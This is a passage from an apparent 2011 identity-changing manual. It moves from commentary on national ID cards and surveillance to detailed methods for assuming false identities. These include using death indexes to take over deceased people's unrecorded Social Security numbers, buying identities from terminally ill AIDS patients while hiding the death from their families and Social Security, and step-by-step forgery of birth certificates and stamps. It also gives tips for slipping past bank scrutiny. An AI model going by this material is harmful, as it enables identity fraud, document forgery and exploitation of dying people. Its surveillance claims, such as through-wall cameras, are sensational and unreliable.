requirements out of the way +more quickly. +- The New Jersey drivers license used to be the most +widely used template but now Maine is offering serious +competition. The Maine DL is a rather simple affair with +few tamper-resistant features. +- Business banking accounts that are non-interest bearing +opened up in rural branch banks are the easiest to open +and operate. The smaller the bank the better. If you can +come up with some convincing papers that indicate that +you’ve recently put together a new business venture – +you’re in business. If you have a large check with you to +deposit in your new account – that will help grease the +wheels and impress your banker. +If you show up around 9:50 am or around 11:50 (just +before morning coffee break or just before lunch) you may +find your banker has other things on their minds and won’t +be quite so careful with your paperwork. If you’re picked a +bank you’d like to do business with, if you have the time +wait until they advertise for new accounts. Chances are +they will be processing a ton of new accounts and yours +will get lost in the rush. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 38 - +Reproduction in any form is prohibited without written permission. + +- It’s much easier to open accounts and deal with online +banks. Many of these banks have become more respected +than in the past. Everything can be done online. The +requirements are the same but you won’t have to put up +with a questioning banker. +- Paypal is not a bank but instead is an online third party +credit card processor for those who have web sites that +sell stuff. But anyone can easily open an account, put in +money, get a very low fee debit card (Visa) and use it just +like a credit card. If you don’t choose the money market +interest option, they won’t even ask your social security +number. One other great benefit here is that most of the +objects for sale on eBay can be paid for through Paypal. +It’s a very attractive alternative to a more restrictive formal +bank account. +- If you vanish for seven years unless someone goes to +court and files, no one will declare you legally dead. But, if +you owe the state money and have left behind any debts, +the state may declare you dead in an effort to grab your +stuff. +- The drivers license once the exclusive domain of the +states, is now being federalized. This is the first step on the +road to a national driver’s license. +- By linking together the state databases, they’re creating a +national birth and death certificate database. This will +greatly accelerate cross-referencing of death and birth +records. (Finally, the old Paper Trip approach to identity +changing is going to die!) +- One provision under serious consideration in Washington +would have the Homeland Security Admin issue unique +new permanent identifying numbers. When a birth +certificate is “registered” with Homeland Security, the +number would be assigned and would remain with the +individual until well after death. +- Biometrics will be part of this new federally-linked driver’s +license. It’s not yet clear whether they will go with a +thumbprint, an iris scan, a palm scan or face recognition. +The choice will be made soon. IBM has been working +feverishly on the thumbprint approach. The new driver’s +licenses will contain a programmable chip that will store +the fingerprint and a whole lot more. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 39 - +Reproduction in any form is prohibited without written permission. + +- The master plan will allow private bankers and other +private businesses to program your license so you can use +it as a debit or credit card, an ATM card, medical ID card +and air travel security pass. +- The new driver’s license could be suspended or +cancelled by simply making an entry in a federal database. +Anyone with a unauthorized card would find it very hard to +survive – even with the assistance of friends. +- The new driver’s license will be sold in two ways. First the +public will be told that this new card will eliminate illegal +aliens, unlawful travel, deadbeat dads who don’t pay child +support, identity theft and underage drinking. Then they +will add many convenience features that will lure people in. +Of course, obtaining and using the new license will be +strictly voluntary. Later when millions have accepted their +new license, their use will become mandatory. +- Birth certificates are becoming harder to obtain in +Connecticut, New Mexico, Iowa, Hawaii and Puerto Rico. +- If you fear these new developments, now may be the time +to renew your existing driver’s license and maybe also your +passport. In this way you can avoid the new application +standards for a few more years. Renew your DL for as long +as possible under your state’s rules. +- If you have an arrest or conviction in your distant past – it +may come back to haunt you soon. Part of this new drivers +license system will fund the linking of a wide range of +databases that contain sensitive personal information. This +includes police, prison and court records that could cause +you problems in the future. One part of Big Brother’s plans +includes placing anyone who has been involved in a +violent act (that includes domestic violence) on the “No Fly” +list. These individuals would be barred from ever boarding +an airplane anywhere in the world forever! Some are +attempting to have their old criminal records cleaned up. +Imagine some cop pulling you over for running a stop sign +and having your entire life’s history right there in front of +them on their handheld computer! That’s where we are +headed! +- In Australia the government attempted to push through a +comprehensive national ID system. It took a tremendous +amount of effort but after two years of demonstrations and +strikes, the government suddenly discovered that the +proposed system contained a fatal error and quickly +abandoned the whole thing. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 40 - +Reproduction in any form is prohibited without written permission. + +The Bottom Line +The Washington insiders who run the federal government would +have us all carrying national ID cards that would have to be +produced upon demand. Armed checkpoints would be placed all +over town. We’d end up standing in long lines going through +detailed checks every time we attempted to go to a mall, a movie, +a bookstore or even the corner barber shop. +Of course, the political insiders who design this terrible system +would very carefully exempt themselves in subtle ways. +Fortunately that level of personal monitoring is unacceptable to +most Americans which keeps their nefarious plans in check. +But should the terrorists hit us again – all bets are off. We might +very well awaken some morning to ourselves living in a totally +monitored high-tech police state – thanks to Osama bin Laden. +Now is the time to protest these developments and crush this +evolving police state before it becomes a fact of life. Write your +representatives today and let them know exactly where you stand. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 41 - +Reproduction in any form is prohibited without written permission. + +Post 9/11 Update +Before 9/11 Immigrant identification cards issued by the US State +Department couldn't be verified online - except by the INS at +border crossings. The INS verification process couldn't be +performed online which meant that any immigrant could wander +into a DMV almost anywhere in the country and easily obtain a +new drivers license. The clerk was forced to fly blind. +And since high-quality immigrant identification cards are widely +available on the black market in any large metropolitan area, +immigrants could obtain drivers licenses quite freely. +In addition, many states had a glaring loophole that the 9/11 +terrorists used in the state of Virginia. Under the old rules you +could "prove" your identity by simply producing a signed statement +from a licensed resident that verified your identity. This loophole is +now history. +The good news here is that most of the new restrictions being +discussed are aimed squarely at illegal foreign immigrants. The +state department has now been funded to come up with an online +system for instantly verifying immigrant documents. +In addition, many states are now limiting immigrant driver’s +licenses to a term of only one year. Also, the license they issue to +immigrants will be in a different format and color than the license +American citizens are issued. +This way the immigrant must appear annually and submit to a +mandatory immigration status review or lose their license. In the +past once an immigrant gained entrance into our society through a +student or work visa, they could, with impunity drop out of school, +ignore our immigration laws and remain in the US indefinitely. No +more. +In some states immigrants may have to wait several weeks or +longer and have their licenses mailed to their home address. This +would allow time to verify their immigration status with the INS and +also help the INS keep track of their precise whereabouts - a task +that went largely ignored until now. +The INS identity cards themselves (which resemble driver’s +licenses) are being altered also. New anti-forgery features are +being added. Though this seemed like a good idea at first it's +backfired a bit. Now there are many different kinds of identity +cards in circulation. +While the newer cards are indeed more difficult to forge, this +© Copyright 2011, Ariza Research, All rights reserved - ABP - 42 - +Reproduction in any form is prohibited without written permission. + +change has created a great deal of confusion in the minds of +those who must screen them. +When you stop to think about it - our driver’s license situation is +rather unique. Most countries have all their drivers licenses issued +from a single centralized federal authority. In the US our drivers +licenses are issued by the individual states and each state +continues to have it's own issuing standards. +And yet the document itself is, under law, accepted nationwide. +Once you've managed to obtain a single drivers license in one +state - you're in - as you can very easily exchange it for another +license anywhere in the country. +Though there are federal laws and rules in the works that will +tighten application requirements somewhat, there still appears to +be little chance that the federal government will impose strict +national application standards anytime soon. +Many states are moving toward a points system that would assign +point values to various identity documents. Should you have a +verifiable drivers license from another state, that would equal 100 +points which means you would get your new license no-questions- +asked. +A birth certificate might earn you fifty points, a library card another +25, an ATM card another 20, and a signed apartment lease might +be good for another 10. If the hurdle is put at 80 points, you simple +assemble the required documents and you're home free. +In some ways this system would actually make the application +process easier to manage. It would reduce the previous confusion +and make the application process much more predictable. +Actually this point system is much better than the old more +intuitive system where the clerk went with their "gut feelings". Now +if you have the right documents, which earn the required points - +the clerk must accept you no questions ask. +In most cases you can get all the information on their system +online, or through a simple phone call. (Remember, you have just +returned after working for ten years plus for Aramco Oil in the +oilfields of Saudi Arabia - which explains why you have no +previous US drivers license) +Strangely, the social security number isn't much of an issue here. +Most of the 9/11 terrorists had genuine fully verifiable social +security numbers and cards. Had their numbers been checked - +they would have cleared the process with no problems. Many +states DMV clerks still can’t check social security numbers online. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 43 - +Reproduction in any form is prohibited without written permission. + +Because of new privacy laws, many states don't even bother to +ask for the numbers (several DMV clerks have been arrested after +selling personal applicant information to identity thieves). Texas +and Utah are two examples. And the old practice of using your +social security number as the driver’s license number is slowly +being eliminated. +Several other states such as Ohio and Alabama ask for and +record the social security number in their records but don't include +it on the license itself and can’t verify it online during the +application process. +Biometrics +There's been much discussion in the US media concerning the +use of biometrics on licenses. The fear is that we'll end up with a +system where the government can track our every move and +every transaction through the use of our fingerprints or our facial +profile. Most Americans view these new technologies with outright +horror. +Imagine a new surveillance system that's hooked up to a wide +range of different databases. A video camera atop a tall pole +detects your car’s movement, which triggers it to zoom in on your +license plate. The number is run through the DMV records and +your entire DMV record suddenly flashes up on the monitor +screen. The computer behind the cameras then creates a “trip file” +which will contain many details on your journey. +As you leave the camera’s area, the computer prompts another +camera to track and record your movements. As you drive your +trip is carefully recorded in the computer’s records. +When you park your car across the street from a store the camera +there watches as you leave your car and stroll across the street. If +you stop to chat with a friend, that fact is also recorded along with +your friend’s identity. +You then enter the store and make a purchase. Of course the +details of your purchase are recorded in your trip file. As you walk +back to your car your path is carefully recorded and analyzed. +Should you stop along the way the monitoring computer may label +your activity as “suspicious” and contact the local police to send a +car to check you out. +Sound like some wild science fiction fantasy from the far distant +future? Think again. The first such system is up and running in +several cities in England. Here in the US we're not quite so +© Copyright 2011, Ariza Research, All rights reserved - ABP - 44 - +Reproduction in any form is prohibited without written permission. + +comfortable with such a system so we’re going to “go slow” on the +use of such invasive technology. +In England the government loves their new system. They claim it’s +cut crime in the most heavily monitored areas by more than half. +But what they don’t tell you is that all that has really happened is +that crime has moved away from the monitored areas. In the +unmonitored areas crime has exploded. +Privacy groups and the ACLU have pressured the federal +government to restrict such "big brother" systems so hopefully this +technology will stay across the pond. +What’s the state of the art in monitoring technologies? By +combining several different technologies the police now have +several units that can provide a level of intrusion that is truly mind- +boggling. +The cop sits in the passenger seat of a standard police car while +his partner drives. In his lap is a powerful laptop computer with a +large display. As he drives past your house he points a large black +gun-like device at the front of your house. +An image pops up on the screen. It’s a razor sharp image of the +inside of your house. It can watch you as you move around your +house. With this breakthrough technology they can determine if +you’re committing illegal acts. They can also watch as you have +sex. They can also watch as your daughter changes her clothes. +Not only can they watch you inside your home, they have a +system in development that can actually identify you using facial +recognition technology (FRT). With this emerging technology +they’ll be able to determine how many people are in your home +and at the same time identify them by their facial traits! +The trend is clear. If we don’t force our representatives in +Washington to come up with an iron-clad privacy bill, it’s only a +matter of time before our entire lives are an open book. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 45 - +Reproduction in any form is prohibited without written permission. + +Driver’s License Developments +But there are some changes that will make it a bit more +difficult to obtain a new drivers license. Notarized copies of +documents may not be acceptable now. Certified copies will +probably be required. +Clerks are being given updated training to help them +recognize forged documents. (but given the thousands of +different birth certificate formats in use - training no matter +how thorough won't help much) More anti-forgery features +will be added to newer licenses. +Mexicans are now routinely fingerprinted when they attempt +to enter the US. Should that same individual attempt to +illegally re-enter the US they will be instantly turned away. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 46 - +Reproduction in any form is prohibited without written permission. + +Chapter 2 +The "Internet" Method +This is by far the fastest and most effective identity changing +system around. We hate to admit it but this system is +somewhat simpler than our older original system that we’ve +been using since 1995. And it can be done without leaving +the privacy of your home! +Find an “Old” Identity +Under this new system an individual would find an online death +database for a particular state. As you will see, many people born +in one state tend to die in another. (birth and death records are +only cross referenced within individual states) +For instance, the California death index can be found at: +http://userdb.rootsweb.com/ca/death/search.cgi +(If you can’t find this particular URL – do a search in any major +search engine (Google is our favorite) under “California death +index”. The index can be found at numerous places around the +web.) From time to time the database is down for maintenance or +updating. If it won't come up, wait a day or two and try again. +A search is then done to locate a half dozen or so deceased +individuals who meet the following criteria: +1. Birth date is within two years of your actual birth date +2. Death occurred before 1988 +3. Has mother’s maiden name listed +4. Is of the same ethnic group as yourself +5. Not born in California (unless you’re Hispanic) +6. No SSN number listed +© Copyright 2011, Ariza Research, All rights reserved - ABP - 47 - +Reproduction in any form is prohibited without written permission. + +The relevant information is then written down. +Full Name (including middle initial) +1. Birth date +2. Birth place +3. Date of death +4. Death location +5. Mother’s maiden name +You shouldn’t just jump on the first few surnames you find that +begin with the letter “A”. Take the time to find others farther along +the alphabet. +Does Big Brother Know They’re Dead? +Once an individual has this information recorded, the next step is +to determine if the death of these persons has been properly +recorded. This information can be found at: +http://www.ancestry.com/search/rectype/vital/ssdi/main.htm +(Once again – if you can’t find this particular URL – do a search in +any search engine under “Social Security Index” or (SSI death +index)”. The index can be found at numerous places around the +web. +Next a search is performed in this index to see if anyone reported +these deaths to the social security administration. Discard any +names that have been registered as deceased. The social security +people were notified of their deaths. +A search is done by last name alone, then last name and first +name and then first and last name with middle initial just to be +sure they’re not recorded in the database. Sometimes the exact +name might come up blank, which can be misleading. +On average if you start out with a list of six names two or three +won't have their deaths recorded. If not, start over again using a +different group of names. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 48 - +Reproduction in any form is prohibited without written permission. + +Criminal Check +Some individuals chose to pursue other optional checks. For a fee +a criminal check could be run. They only did this with individuals +who lived to be over age 16 or so. There would be little chance +that a person younger than 16 being involved in criminal activity. +The identity of an established criminal is worthless for any +purpose. +Legal Name Change +The next step in this system involves changing the name of your +"old identity" (the name you located in the various databases). +There are two ways to approach having the name changed. We +prefer the name change “kit” approach. +These kits can be found in many places on the Internet if you look +around. Firms sell kits for all sorts of legal purposes (divorce, wills, +bill of sale etc..) This seems to be the cheapest and simplest way +to perform a legal name change. +Or you can approach a lawyer to have your name legally changed. +The lawyer will, of course, cost you more but he may be able to +help you get things done more quickly (and quietly). +There are a number of legal reasons why someone might want to +change their name. Those disowned by a recently deceased +parent may want to change their family name. Despite leaving a +substantial fortune, a disowned person receives nothing. Siblings +are often also hostile. In this situation anyone would want to sever +all family links and live out their lives under a new name. +Those who have legally changed their names have done so in +rather remote places where they haven't lived too long. Under law +the name change will remain in the court’s records. Any +investigator will have to know in exactly what location the name +was changed if they wish to locate the official legal records. +If you change your name in your hometown, you’ll be making it +very easy for a snoop to discover what you’ve been up to. +But the cleverer name changers are those who chose to perform +the name change in some remote state where the residency +requirements are less of a problem and no one would ever think of +looking. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 49 - +Reproduction in any form is prohibited without written permission. + +Of course, the legal requirements for name changes and their +rules regarding how and where records are maintained vary +widely from state to state. Some states require exhaustive +background disclosures, court investigations, minimum residence +requirements or personal references. +The laws may even require that your personal references appear +in court where they can provide their input under oath. +Other states are much less restrictive. Some states maintain a +statewide database of name changes, which can be easily +searched. The states listed below that include "local records only" +would be those that afford the greatest degree of personal privacy. +It's best to at least consult with a local attorney to be sure that +your name change will be processed without any problems and +that what you're doing doesn't violate any local laws. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 50 - +Reproduction in any form is prohibited without written permission. + +Typical Legal Name Change Application Form +(Your name) (Address) (Telephone) +In Proper Person +DISTRICT COURT ______________________COUNTY, +NEVADA +In the Matter of the ), Application of : ) +for Change of Name ), +ORDER FOR CHANGE OF NAME +This matter having come on for (circle one) hearing/summary +disposition in the Family Division of the ____________ Judicial +District Court, County of ____________ and the Court being fully +advised in the premises, both as to subject matter as well as the +party thereto, and that jurisdiction is proper in Nevada, and good +cause appearing therefore; +IT IS HEREBY ORDERED that Petitioner’s name be changed +from __________________ to _________________. +IT IS FURTHER ORDERED that the Dept. of Vital Statistics shall +issue a new birth certificate for Petitioner with the name +of:_______________. +DATED this _______ day of __________, ____. +DISTRICT COURT JUDGE +Respectfully submitted: +(Your signature) ___________________________ +(Your name) _________________________ +(Address) _________________________ +(Telephone) __________________________ +© Copyright 2011, Ariza Research, All rights reserved - ABP - 51 - +Reproduction in any form is prohibited without written permission. + +To the best of our knowledge the states listed below have less +restrictions than others: (however be aware that laws can and do +change) +Most Liberal States for +Legal Name Change +State Details +Alabama Records kept at county level +Arizona Performed at each court +Arkansas Performed at each court +California Four week waiting period +Delaware Performed at district court level +Idaho Laws are unclear +Indiana Laws are unclear +Kentucky Records kept at county level +Maine Performed by probate court - Lawyer required +Performed at circuit court - Lawyer not +Maryland +required +Mississippi Laws are unclear +Performed at circuit court - 20 day waiting +Missouri +period +Montana Local records only +Nevada Performed at district court +New +Performed at probate court +Hampshire +New Jersey Local records only +Rhode +Probate court - Lawyer may be required +Island +Tennessee County or probate court - local records only +Texas Local records only +Washington Local records only +Once the court has certified the legal name change, you can take +the papers to the social security office. The social security people +have a rather simple name change form. A computerized +statement is then generated that documents your name change in +their records. You will then be issued a new social security card. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 52 - +Reproduction in any form is prohibited without written permission. + +According to social security procedures, this is a very routine +procedure that seldom causes any problems. The social security +people respect court actions and assume the court followed +established procedures so the whole thing is proper and entirely +legal. +At this point an individual would have a new name attached to an +old abandoned social security number. Those who have used this +system report that it's security rests in the fact that dead men tell +no tales. +Some individuals find it useful to have a new birth certificate also. +There are two approaches here. Some find it useful to use the +forgery techniques reported below. This tactic is fine except that if +an individual wanted to apply for a US passport at some point in +the future, a birth certificate that can be verified in the official vital +records files will be required. +Some have used the following process that can be performed +entirely through the mail. Send a letter to the vital records office. +We have received reports that the best states are Nevada, +Colorado, New Mexico and Ohio. These are the best states as +they are the only ones that "seal" the old birth certificate and issue +a brand new one. (Many other states just append the new BC, +which can get complicated) +The vital records office will have a form that is submitted along +with your court legal name change certification. A new birth +certificate is routinely issued in the new legal name. Again, this is +a normal procedure that can be easily done provided the proper +papers and forms are submitted. Some have found it useful to +have an attorney perform this function for them. +Under this system the next goal would be a new driver’s license. +Many have started by finding a local driver’s education firm where +they took some lessons. +If asked why they haven't learned to drive, they simply said they +lived in New York City (where few people own cars) or have been +working in a far off land such as Saudi Arabia. (The author of this +system reports that it's useful to have an international drivers +license issued by the AAA office to support the claim of overseas +employment.) +Some have found the drivers’ education graduation certificate is +widely recognized and respected by those who process drivers’ +license applications. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 53 - +Reproduction in any form is prohibited without written permission. + +What About any Possible Debts? +it's possible that someone died and left considerable debts +behind. Due to credit rating agency rules, any debt over ten +years old should be long gone and forgotten. Some have +found it useful to run a test just to be sure. Few have found +any record of debts though it's certainly not impossible. +If there is a file listing some old debts (credit agencies are +supposed to purge records more than 10 years old but +sometimes neglect to bother) those records can be +challenged and erased under the requirements of the fair +credit-reporting act. +These old debt records can usually be cleared away with a +simple phone call. This is a routine problem that is usually +quickly resolved. To be sure the requested changes are +done the law allows an individual to ask for a printed record +of the clean new credit file. +The major credit reporting agencies are: +Equifax +www.equifax.com +Report fraud: 1-800-525-6285 +Order a credit report: (800) 685-1111 +P.O. Box 740256 +Atlanta, GA 30374-0241 +Experian +www.experian.com +Report fraud: 1-888-397-3742 +Order a credit report: +(888) EXPERIAN (397-3742) +P.O. Box 1017 +Allen, TX 75013-0949 +Trans Union +www.tuc.com +Report fraud: 1-800-680-7289 +Order a credit report: (800) 916-8800 +Fraud Victim Assistance Department +P.O. Box 6790 +Fullerton, CA 92834 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 54 - +Reproduction in any form is prohibited without written permission. + +If you look around the web you'll find several sites that will, for a +reasonable fee provide you with a computerized report that +combines credit information from all three major reporting +agencies all on one easy-to-read form. I'd give you a URL but +these outfits move around a bit. +Users of this system report that at the end you have a new name, +new social security number and a new drivers license in a new +name. If anyone checks, the social security number, birth +certificate and drivers license will all be fully verifiable and properly +recorded. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 55 - +Reproduction in any form is prohibited without written permission. + +Chapter 3 +The "Living Dead" Method +Today more people than ever are seeking to change their +identities, so it’s inevitable that new approaches would +emerge from time to time. Such is the case with the new +"living dead" technique. Someone spent considerable time +and effort coming up with this inventive system. +In the ebb and flow of human history situations occur that +create opportunities that are often mutually advantageous for +both the individuals involved. With this new approach +anyone who desires to obtain a new identity can simply +purchase one from an individual who is near death. Sadly +the AIDS epidemic is providing a large and growing pool of +doomed individuals that find themselves in desperate +financial straits. The purchaser gets the new identity +documents they need while the donor gets badly needed +financial help for himself and his family during his final +months. +It all starts with a classified ad similar to the following: +Wanted: Caucasian male age 30-40, dying of AIDS or +other terminal illness – Generous cash fee paid Call 555- +1234 +For around $500-1,000 cash an individual can purchase a +full set of ID documents that supports an already established +identity. But like the other identity changing systems I've +reported on, there are flies in this ointment. This whole +approach has some unique advantages but also presents +some rather unique obstacles. +First is the issue of body similarity. The identity donor should +be somewhere around the same height/weight and age as +the purchaser. A few inches or years here or there won’t +matter much. Eye color is another issue though much less +important than body type. (too much variance could present +a problem) though small differences could be masked with +tinted contact lenses) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 56 - +Reproduction in any form is prohibited without written permission. + +Obviously it would be ideal if your donor had a somewhat +similar facial appearance or at least a face with an overall +shape similar to your own. Under this system it's not +necessary to find an identity donor who looks exactly like the +purchaser. The driver’s license picture will be an entirely new +one. +The ideal donor would plan to have their body cremated and +their ashes scattered thus avoiding the existence of a +gravestone, which would allow others to share the identity +using the tired old "dead infant" system. If the identity donor +is resistant to the idea, the identity purchaser might offer to +pay for the cremation and/or even offer to scatter the ashes +in some particular spot as an incentive. (be sensitive +however that for theological reasons some religious +individuals may be resistant to the idea of cremation) +Under this system any agreement between the identity +purchaser and donor must be kept an absolute secret. The +donor's family is to know nothing of the transaction - that is +vital or the whole system falls apart. The donor must agree +from the very beginning. +The fee the purchaser provides should include the $300 fee +the social security administration routinely pays the family to +register the deceased as officially dead. (the so-called "death +benefit") Remember, no one is truly dead until the social +security says they are. Obviously it’s in the purchaser's +interest to be sure the death is never officially recorded. +The author of this system reports that the credit reporting +agencies routinely search the social security death index and +attach a note to the credit file which would then be sent out +to anyone who requests a copy of the donor's credit file. +If a family member should return any kind of official +document to any agency, it would compromise this whole +system. +The ideal donor would be born in a state different from the +state in which they die. Users of this system report that some +counties are cross-referencing birth and death records. +In most cases the donor will have a spotless legal history but +you should ask just in case. Some found it desirable to +perform a criminal records search just to be sure. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 57 - +Reproduction in any form is prohibited without written permission. + +The author of this system reports that a search can be easily +done by claiming that the search is a routine pre- +employment check. (A check will cost around $50 - $100). If +the donor is a known drug dealer or has some other criminal +record, move on to other donors. +Users have reported that under this system even a few +speeding tickets could make it difficult to obtain a drivers +license. A donor should also be asked about their driving +record. +About money – terminally ill patients often let their credit +ratings fall apart as they ignore all but the most pressing +bills. The purchaser should ask (or require) that your donor +provide a recent copy of their credit report. The donor should +provide a list of all outstanding debts. Or the purchaser could +spend a few bucks and obtain a copy of the donor's credit +file. +If all goes well, the purchaser should now have a full set of +identity documents in hand. Of course the photo on the +drivers’ license is going to be the donor's. Some have found +a simple way to get around this problem. They have gone to +their local drivers’ license bureau and reported their driver’s +license as being lost. The standard policy is to issue a new +license, which will, of course, involve the taking of a new +photo. +The author reports that some driver’s license bureaus now +call up an image of the license holder and compare that +image with the applicant. Some individuals have found it +useful to have a friend go through the license replacement +process to learn the details. +Some states allow individuals to report their lost licenses by +mail or even on the phone. Many identity purchasers have +found it useful to pursue their new drivers’ license in another +state, which will probably avoid the image comparison +problem. As they now have a full set of ID, they should have +no problems with the replacement application. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 58 - +Reproduction in any form is prohibited without written permission. + +Users of this system warn that identity purchasers should +leave all their old identity ID at home. Most government +offices now have armed guards who will retain and question +applicants if the clerk doesn’t like the look of the applicant's +ID documents, the sound of the story or the applicant's +overall appearance and attitude. +Be aware that the clerks in these places see a regular +stream of alcoholic applicants who attempt to obtain a new +license after losing their old ones due to excessive DUI +convictions. Dressing and acting like a clean, respectable +person is a necessity. +Some have found it useful to pursue another option. Once +the purchaser has been living under the donor's new identity +in a new location for a year or so, they might want to legally +change their name. +If an individual can locate a good clean donor, this system +has potential. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 59 - +Reproduction in any form is prohibited without written permission. + +Chapter 4 +The Classic “Ariza” Method +1. The "Quick and Easy" Way +This system involves creating a forged birth certificate and a +matching forged baptismal certificate with which other +identity documents can be obtained. While this approach is +very quick and has been used to obtain a new drivers +license, unfortunately it produces an identity that won’t stand +up to close scrutiny. +Anyone with ten bucks can discover that the forged birth +certificate is a fake. Because a verifiable birth certificate is +needed to obtain a new social security number, you won’t be +able to get a legitimate "on the books" job under your new +name. If you don’t have to work for a living or don’t plan to +travel internationally AND have money, someone else who +supports you or are employed in the cash "underground" +economy or work as a "contractor" (your wages are reported +on IRS form 1099 not on the usual W-4) then this system +might be useful. +2. The "Slow and Hard" Way +Then there’s the much more comprehensive method which +requires homework, creativity and some time. It involves +doing research to find a suitable set of parents (dead of +course) and then generates a completely new identity that +will include the issuing of a genuine, verifiable birth +certificate including it’s placement in the official records. +This method will create an entirely new identity that will +stand up to close scrutiny and will allow you to obtain a new +social security number and even a genuine passport. +3. The "Combo" +And lastly, there’s the combo - a combination of the "quick +and easy" and the "slow and hard" approaches. With it you +do the research required to find two new parents. You then +forge a birth certificate and baptismal certificate in your new +name. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 60 - +Reproduction in any form is prohibited without written permission. + +You get your drivers license quickly and then begin the time- +consuming process of getting all the paperwork going to +construct the rest of your completely new identity. +"Quick +"Slow & +& "Combo" +Hard" +Easy" +Drivers +Quick Slow Quick +License +Social +Make +Security Genuine Genuine +One Up +Number +Social +Make +Security Genuine Genuine +One Up +Card +Birth +Forged Verifiable Verifiable +Certificate +Employment Difficult Yes Yes +Credit Cards Maybe Yes Yes +THE "QUICK AND EASY WAY" +First make a copy of your genuine birth certificate. It can +then be photocopied and doctored quite easily. The larger +copy centers usually have a helpful clerk behind the counter +who can make much higher quality copies using the big +expensive systems. Even higher qualify copies can be +obtained by asking the clerk to please clean the glass before +making copies. +Some have volunteered that it's best to visit the copy center +during the slower nighttime or early morning hours as the +crowd is smaller and the service faster and more +comprehensive. +This section of this system comes from a professional forger +called "Nifty" (a reference to the appearance of his +documents) He advises the purchase of a bottle or two of +"White Out" or "Liquid Paper" that’s labeled "For Copies". +© Copyright 2011, Ariza Research, All rights reserved - ABP - 61 - +Reproduction in any form is prohibited without written permission. + +He also recommends using some of those sticky cover-up +strips made by the nice people at Avery label. They come on +a roll like scotch tape or in a flat pack. +Nifty prefers the flat pack with a width of around 3/16th of an +inch.(though you can buy the wider strips and just trim them +down with good sharp scissors) A very sharp knife and a +good pair of scissors will come in very handy. Most people +who attempt forgery need a good magnifying glass. +The initial goal now is to create a completely blank birth +certificate form from one of your copies. Do this by covering +up all the data typed or written into those little blocks. Use +the cover-up strips to cover both typewritten and hand- +written entries. Leave the signature on the bottom alone. If +there’s a shadow image of a raised seal, cover it up +completely. +Try not to leave any typing behind. You’ll have a real +problem matching any new typewriting to the older typeface. +According to Nifty - mismatched typefaces are the single +most obvious sign of a forgery to anyone experienced in +spotting fake documents. +You should now have an absolutely clean, blank form. This +can be tricky when some of the typing or writing crosses a +line that’s part of the form. Usually the careful placement of a +cover-up strip will do the job but you’ve got to be very careful +to make the job look professional. Don’t cover up any part of +a line that was on the original form. +You may blow the first attempt, that’s normal. That’s why +several copies of your original birth certificate may be +needed. Once in place, paint the ends of the cover up strips +with whiteout. This will help to reduce the possibility of +shadows of the ends of the strips appearing on copies of the +new blank form. +If this happens anyway, reduce the darkness level on the +copy machine until they disappear completely. These little +shadows are another important sign of an altered document +so you can’t afford to ignore them. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 62 - +Reproduction in any form is prohibited without written permission. + +Another tip from Nifty - put a dot of the "Liquid Paper" on any +little black specks that might appear on your copy. You want +to cover up all the little dots, smears, and lines etc. that +aren’t part of the original form. Remember, we’re shooting +for the cleanest, most original looking form possible. It won’t +appear flawless but then most genuine birth certificates are +far from perfect. +Return to the copy center. (Take a jar of "liquid Paper" along +for last minute touch-ups.) This time forget the guy behind +the counter. (Privacy is important now) It's best to use the +cheaper self-service machines. Make a single copy of the +cleaned-up certificate with the darkness control set in the +middle of the range. Take a very good look at it. Hold it up +and let the light pass through from behind. Does it need any +touching up? Are there any signs of the cover up strips on +the copy? +Crank up the darkness level until your cover up work starts +to show, then back off just enough to give you the darkest, +crispest form possible with absolutely no sign of doctoring. +If your original BC was reduced to a smaller size, choose an +enlarger copier and blow up the copies as large as possible +without going off the edge of the paper. You can reduce it’s +size later after it’s been filled in with new information. +Make several copies of the new blank BC. Does it look +good? If the lines on the form are not straight and clean, try +another copier or you may have to return to the clerk behind +the counter for a higher quality copy made on one of the big +machines. Nifty says to choose a different clerk than you +used on your first trip. Going there at a different time of day +will usually assure that you’re dealing with a new crew or use +a completely different copy center. +The next step requires a typewriter - preferably one from +around the time you were born. Only use a modern electric +typewriter if you were born after the late 1960s. Otherwise +modern type quality would appear unusual on an older +document. If you're older than that, you’ll need an older +machine with uneven even blotchy type. Libraries usually +have old typewriters for rent very cheap. Or an older +reconditioned unit could be found at an office supply center +or one might be for rent at a larger copy center. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 63 - +Reproduction in any form is prohibited without written permission. + +But many have found just the right machine at a swap meet +or flea market. On one recent Sunday we found three +suitable old manual portables at a local flea market. The best +one went for a whopping five bucks. (an Underwood from the +late 1950s). An old machine will probably need a good +cleaning and a fresh new black ribbon. +Some have simply looked in the yellow pages for the largest +used typewriter dealer in town. They often deal in +reconditioned old typewriters. +They won't be out on display but may instead be found on +some bottom shelf somewhere as they aren't all that +profitable an item for the store. +A dealer will doubtless charge more than the flea market but +you won’t have to wait for the next flea market meet. Either +way you get the old-fashioned uneven looking typestyle that +will make any old document look good. Don’t worry if one or +two of the characters don’t print just right, that’ll just make +the BC look that much better! +Nifty says that if your original BC includes a rubber stamp +that says something like "Certified Copy" or "Registered +Copy" - cover it up except for the certifying signature. +Leaving the stamp and signature "as is" is the quickest +tactic. But if you want to do it right you’ll mask out the stamp +and replace it with a more official looking "Certified Copy" +stamp in purple ink which will make your birth certificate look +even more genuine. +Any large rubber stamp store will have many of the same +old-fashioned typefaces like the stamp image on your +original BC. Again, the phone book is the best place to look. +Ask to choose the font/typeface and pick one that’s old- +fashioned looking and as close as possible to the original +stamp. +Pick up the stamp and buy a bottle of red stamp ink, a bottle +of blue stamp ink (dark blue or blue-black) and an inkless +stamp pad (look inside the pad - it’s surface should be made +of clean 